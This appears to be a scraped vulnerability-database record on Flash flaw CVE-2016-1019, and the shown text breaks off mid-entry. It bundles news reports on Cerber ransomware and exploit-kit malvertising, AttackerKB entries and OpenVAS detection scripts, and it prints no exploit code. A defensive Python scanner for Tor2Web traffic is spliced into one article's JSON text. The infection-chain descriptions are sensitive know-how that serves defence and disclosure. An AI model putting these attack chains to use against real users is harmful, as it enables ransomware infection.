Its [typical distribution method was via exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>), with Magnitude and Nuclear Pack exploiting a zero day in Adobe Flash Player (CVE-2016-1019). In May, [researchers at FireEye reported](<https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/>), Cerber was part of spam campaigns linked to Dridex botnets. In August, researchers reported a new Cerber variant, [dubbed Cerber 2](<https://threatpost.com/2-5-million-a-year-ransomware-as-a-service-ring-uncovered/119902/>), which they said was part of a ransomware-as-a-service ring.\n\n\u201cCerber has continued to shift its tactics and evolve rapidly over just the past several months,\u201d Biasini said.\n\nIn this most recent campaign, once the initial redirection and Tor2Web proxying occurs, the victim\u2019s system will download a malicious Word document. If a potential victim opens the downloaded file, they are prompted via the Word document to \u201cenable content\u201d, that is, the macro.\n\n\u201cIf the victim opens the malicious MS Word document and enables macros, the downloader will use the Windows Command Processor to invoke Powershell which will then download (using Tor2Web) and execute the actual Cerber PE32 executable,\u201d Talos describes.\n\nThis version of Cerber demands 1.4 bitcoins ($1,000). If the ransom demand is not met within five days the ransom payment amount doubles.\n\n\u201cThis latest distribution campaign highlights how ransomware based threats are continuing to evolve and mature over time, and shows an increasingly sophisticated infection process as attackers continue to implement new methods to attempt to evade detection and make analysis more difficult,\u201d Talos researchers wrote.\n\nTalos recommends that all Tor2Web and Tor traffic be blocked in the organization as the most effective way to mitigate risk from this latest Cerber threat. 
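The redirect chain Talos describes above (a google.com/url redirect, then a Tor2Web gateway, then the .onion-hosted Word document) is visible at the web proxy, which is where the recommended block or alert belongs. The following Python is an added example, not code from the Threatpost article or from Cisco Talos: it unwraps Google redirects, then flags destinations whose host is a bare .onion name or an onion name parked under a Tor2Web gateway. The log line format and the gateway suffix list are assumptions (the article names no gateways; onion.to, onion.cab, onion.link and tor2web.org were publicly operated Tor2Web front-ends, and the list should be replaced with one from your own intelligence feed). The sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# ASSUMPTION: Tor2Web gateway suffixes. The Talos report names none; these were
# publicly operated front-ends at the time. Replace with your own feed.
TOR2WEB_SUFFIXES = ("onion.to", "onion.cab", "onion.link", "tor2web.org")

# A v2 onion name is 16 base32 characters, a v3 name is 56. A Tor2Web gateway
# keeps the name as the leftmost label: <onion-name>.onion.to, <onion-name>.tor2web.org
ONION_LABEL_RE = re.compile(r"^([a-z2-7]{16}|[a-z2-7]{56})\.(.+)$")


def unwrap_google_redirect(url):
    """Return the target of a google.com/url?q=... redirect, else the URL unchanged."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if (host == "google.com" or host.endswith(".google.com")) and parts.path == "/url":
        query = parse_qs(parts.query)
        target = query.get("q") or query.get("url")
        if target:
            return target[0]
    return url


def classify_destination(url):
    """'onion' for a bare .onion host, 'tor2web' for an onion name under a known
    gateway, 'unknown-gateway' for an onion name under any other 'onion.<tld>'
    suffix, None for ordinary hosts."""
    host = (urlsplit(url).hostname or "").lower()
    m = ONION_LABEL_RE.match(host)
    if not m:
        return None
    rest = m.group(2)
    if rest == "onion":
        return "onion"
    if rest in TOR2WEB_SUFFIXES:
        return "tor2web"
    if rest.startswith("onion."):
        return "unknown-gateway"
    return None


def scan_proxy_log(lines):
    """Return (client, final_url, verdict) for every request that ends up on Tor.
    ASSUMPTION: one request per line as '<client-ip> <method> <url> <status>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        final = unwrap_google_redirect(url)
        verdict = classify_destination(final)
        if verdict is not None:
            hits.append((client, final, verdict))
    return hits


# Constructed sample, not real traffic; the onion names are made up.
SAMPLE_LOG = """\
10.0.0.5 GET https://www.google.com/url?q=http%3A%2F%2Fabcdefghijklmnop.onion.to%2Forder.doc 302
10.0.0.5 GET http://abcdefghijklmnop.onion.to/order.doc 200
10.0.0.7 GET https://www.example.com/hiking/trail.html 200
10.0.0.9 GET http://abcdefghijklmnop.onion/order.doc 0
10.0.0.9 GET http://abcdefghijklmnopabcdefghijklmnopabcdefghijklmnopabcdefgh.onion.pet/x 200
""".splitlines()

if __name__ == "__main__":
    for client, url, verdict in scan_proxy_log(SAMPLE_LOG):
        print(f"{verdict:16} {client:10} {url}")
```

Blocking on the verdict is what Talos recommends; alerting on "unknown-gateway" additionally catches front-ends the list misses, because any host that carries a 16- or 56-character base32 label directly under "onion." is a Tor2Web-style gateway whatever its top-level domain.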
\u201cOrganizations need to decide if the business case for allowing Tor and Tor2Web on the network outweighs the potential risks to its users,\u201d Cisco Talos wrote.\n", "cvss3": {}, "published": "2016-11-30T07:00:33", "type": "threatpost", "title": "New Cerber Variant Leverages Tor2Web Proxies, Google Redirects", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-11-30T07:31:11", "id": "THREATPOST:FA8E33E96268AABB7760B30AFBCF0924", "href": "https://threatpost.com/new-cerber-variant-leverages-tor2web-proxies-google-redirects/122169/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:31", "description": "Adobe will release an emergency Flash Player update as soon as Thursday, patching a critical vulnerability that is being publicly attacked.\n\nAdobe said the vulnerability is in version 21.0.0.197 and earlier for Windows, Mac OS X, Linux and Chrome OS.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa16-01.html>) published late this afternoon.\n\nAdobe said that a mitigation introduced on March 10 in Flash 21.0.0.182 protects users against attack; users are urged to update immediately. 
Adobe said active attacks using CVE-2016-1019 are targeting Windows 7 and Windows XP systems running Flash 20.0.0.306 and earlier.\n\nFrench researcher Kafeine, who publishes updates on his personal site on exploit kits, is one of three researchers credited with disclosing the bug to Adobe along with FireEye\u2019s Genwei Jiang and Google\u2019s Clement Lecigne.\n\nKafeine told Threatpost he would not comment before the availability of a patch.\n\nThe March 10 [Flash Player update](<https://threatpost.com/flash-player-update-patches-18-remote-code-execution-flaws/116707/>) was part of Adobe\u2019s regular monthly security update cycle. It patched 18 remote code execution flaws, including one, CVE-2016-1010, being exploited in the wild.\n", "cvss3": {}, "published": "2016-04-05T19:09:09", "type": "threatpost", "title": "Emergency Adobe Flash Player Security Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1010", "CVE-2016-1019"], "modified": "2016-04-07T21:57:25", "id": "THREATPOST:02FB00D8BE50B1B6165E20F03EBF20C0", "href": "https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. 
AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. 
One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. \u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May,\u201d Kafeine said, identifying a number of vulnerabilities exploited by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. 
\u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "cvss3": {}, "published": "2017-06-20T14:27:43", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2017-06-20T18:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. 
Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler in particular was popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. Code on the page determines the browser being used and launches the exploit most likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploit kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. 
Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in July, but already it had been used by Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two other Flash Player bugs, round out the top three. [CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": "https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:15", "description": "Despite [a marked decrease in activity](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), exploit kits haven\u2019t completely disappeared just yet. 
The Neptune, or Terror Exploit Kit, is alive and well; during the last month, researchers have observed the kit as part of a campaign to abuse a legitimate popup ad service to drop cryptocurrency miners.\n\nResearchers with FireEye [said Tuesday](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the kit has been redirecting victims with popups from fake hiking ads to exploit kit landing pages and in turn to HTML and Adobe Flash exploits. Researchers elected not to disclose the name of the popup ad service, but stressed that it\u2019s within Alexa\u2019s top 100.\n\nThe landing pages run a handful of exploits, including three targeting Internet Explorer (CVE-2016-0189, CVE-2015-2419, CVE-2014-6332) and two targeting Flash (CVE-2015-8651, CVE-2015-7645).\n\nAccording to FireEye researchers Zain Gardezi and Manish Sardiwal, the malvertising redirects are mimicking the domains of actual hiking sites, and in some instances sites that allow users to convert YouTube videos to MP3s. Once redirected, the ads, most of which appear on high-traffic torrent and multimedia hosting sites, drop a Monero miner.\n\nMonero, an open source cryptocurrency that bills itself as \u201csecure, private, and untraceable,\u201d has caught on with cybercriminals over the last several months.\n\nOne cryptocurrency miner, [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>), was spotted in April using the same NSA EternalBlue exploit and DoublePulsar rootkit that spread WannaCry, to infect computers and mine Monero.\n\nAccording to FireEye, for the new Neptune EK campaign a uniform resource identifier (URI) belonging to the exploit kit domain has been dropping the payload as a plain executable. 
After a machine has been infected, attempts are made to log in to minergate[.]com, a cryptocurrency GUI miner and mining pool, with the attacker\u2019s email address.\n\nResearchers noticed this campaign on July 16 and were able to pin it on changes in the kit\u2019s URI patterns.\n\nSpreading resource intensive cryptocurrency miners helps attackers raise small amounts of money that can potentially be used to fund other future attacks.\n\n[Attackers in June](<https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/>) used an exploit for a Samba vulnerability patched in May to spread payloads that spread Monero miners. Researchers with Kaspersky Lab who discovered the operation said that attackers hardcoded their wallet and pool address into the attack and managed to raise $6,000 USD via the campaign.\n\nThe vulnerabilities that Neptune uses are dated; in fact Microsoft fixed one of them in November 2014, CVE-2014-6332, which could have allowed remote code execution via Windows OLE vulnerabilities. Gardezi and Sardiwal warn that users running out-of-date or unpatched software could still be at risk, especially as drive-by download kits such as Neptune have taken a shine to using malvertisements to push malicious downloads of late.\n\nSimilar to Sundown, the Neptune/Terror exploit kit is one of several that popped up following Angler\u2019s disappearance in 2016. 
Researchers said [in May earlier this year](<https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/>) that the kit had adopted new anti-detection features and slowly evolved into a threat.\n", "cvss3": {}, "published": "2017-08-22T17:51:58", "type": "threatpost", "title": "Neptune Exploit Kit Dropping Cryptocurrency Miners Through Malvertisements", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T21:51:58", "id": "THREATPOST:3F20438316043C71AAD9C85191711EEE", "href": "https://threatpost.com/neptune-exploit-kit-dropping-cryptocurrency-miners-through-malvertisements/127591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-05-04T14:21:52", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "attackerkb", "title": "CVE-2016-1019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2020-06-05T00:00:00", "id": "AKB:1B9FE055-9F52-4311-A5FC-E996A72071B1", "href": "https://attackerkb.com/topics/0Vp2rXY6rx/cve-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T02:33:17", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cJScript9 Memory Corruption Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2015-2419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-06-05T00:00:00", "id": "AKB:EE437A8A-C572-480C-AAFD-F336171F4417", "href": "https://attackerkb.com/topics/P1XXD2L59b/cve-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T19:57:20", "description": "Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary 
code by overriding NetConnection object properties to leverage an unspecified \u201ctype confusion,\u201d a different vulnerability than CVE-2016-1019.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-09T00:00:00", "type": "attackerkb", "title": "CVE-2016-1015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1015", "CVE-2016-1019"], "modified": "2020-06-05T00:00:00", "id": "AKB:491D573A-D9C4-4DBE-B502-578A6EF314AC", "href": "https://attackerkb.com/topics/1D61Z63nT2/cve-2016-1015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-09T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:0990-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851268", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310851268", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851268\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-09 05:01:00 +0200 (Sat, 09 Apr 2016)\");\n script_cve_id(\"CVE-2016-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:0990-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to fix one security issue.\n\n This 
security issue was fixed:\n\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a\n denial of service (application crash) or possibly execute arbitrary code\n via unspecified vectors, as exploited in the wild in April 2016\n (bsc#974209).\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0990-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.616~126.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.616~126.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:13:36", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-050.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", 
"CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2020-05-14T00:00:00", "id": "OPENVAS:1361412562310810666", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810666", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810666\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:00:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-050.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due 